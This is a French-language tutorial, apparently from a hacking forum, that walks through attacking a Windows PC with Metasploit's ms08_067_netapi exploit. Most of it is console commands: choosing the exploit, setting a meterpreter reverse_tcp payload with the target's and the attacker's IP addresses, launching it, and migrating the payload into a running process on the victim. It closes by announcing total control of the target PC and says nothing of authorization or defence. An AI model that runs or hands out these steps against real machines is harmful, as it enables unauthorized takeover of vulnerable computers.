Metasploit reverse_tcp
Exemple avec l'exploit ms08_067_netapi



Ici nous allons utiliser le payload reverse_tcp en utilisant l'exploit ms08_067_netapi

Vous pouvez voir ici les détails de cet exploit et les systèmes faillibles à celui-ci.

Veillez à ce que Metasploit soit à jour:
Code:
msfupdate









I- Lancement de la console Metasploit.
Code:
msfconsole









II- Choix de l'Exploit

Pour trouver l'exploit qui vous convient vous devez aller vous renseigner ici

Après avoir trouver l'exploit adéquat vous pouvez aller le chercher dans Metasploit avec la commande:
Code:
search <nomExploit>
<nomExploit>:à remplacer par l'exploit que vous recherchez.

Ou vous pouvez aussi rentrer directement l'exploit si vous connaissez son nom:
Code:
use <nomExploit>
<nomExploit>:à remplacer par l'exploit que vous souhaitez.

Ici nous allons utiliser l'exploit ms08_067_netapi.

Donc nous entrons ceci:
Code:
use exploit/windows/smb/ms08_067_netapi









III- Choix du Payload

Pour voir la liste de tous les payloads compatibles avec l'exploit choisi nous entrons la commande:
Code:
show payload
Dans ce tutoriel nous allons utiliser le payload "reverse_tcp", mais rien ne nous empêche d'en choisir un autre à votre convenance.

Avec la commande:
Code:
set payload <NomDuPayload>
<NomDuPayload>: à remplacer par le nom du Payload que vous avez choisi.

Nous entrons donc la commande:
Code:
set payload windows/meterpreter/reverse_tcp









IV-Configuration du Payload

Pour voir les différentes options du payload, entrez:
Code:
show options
Ici nous allons configurer "RHOST" et "LHOST" du Payload "reverse_tcp".
Pour configurer une option il faut utiliser cette commande:
Code:
set <options> <attribut>
Dans notre exemple, comme ceci:
Code:
 set RHOST <IpCible>
Code:
 set LHOST <VotreIp>
<IpCible>: à remplacer par l'adresse IP du PC-Cible de l'attaque.
<VotreIp>: à remplacer par votre adresse IP.











V-Exécution de l'exploit

Pour lancer l'attaque, entrez la commande:
Code:
exploit









VI- Migration du Payload dans un processus.

Tout d'abord nous allons lister les processus actifs du PC-Cible:
Code:
ps
Choissisez alors un processus grâce à son PID (code composé de chiffres placés avant le nom du processus).

Avec la commande
Code:
migrate <PIDduProcessus>
<PIDduProcessus>: à remplacer par le PID du processus de votre choix.

Par exemple:
Code:
migrate 1184









VII-Exploitation du PC-Cible

Désormais vous avez un contrôle total sur votre PC-Cible.

Vous pouvez voir l'étentue des possibilités de Meterpreter avec la commande:
Code:
help


Merci d'avoir lu mon tutoriel.